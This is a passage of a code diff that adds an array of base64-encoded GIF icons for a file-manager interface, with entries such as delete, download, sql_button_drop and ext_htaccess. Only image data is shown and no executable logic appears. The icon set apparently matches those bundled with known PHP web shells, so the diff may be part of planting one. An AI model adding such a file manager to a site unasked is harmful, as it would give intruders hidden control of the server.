+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGdQChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1dQ19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9dQ7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9dQ////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9dQ01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9dQ01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++dQ/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/dQ6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5dQ4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwdQtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9dQwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSdQ10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7dQ08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LdQ9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDdQ8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"dQEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
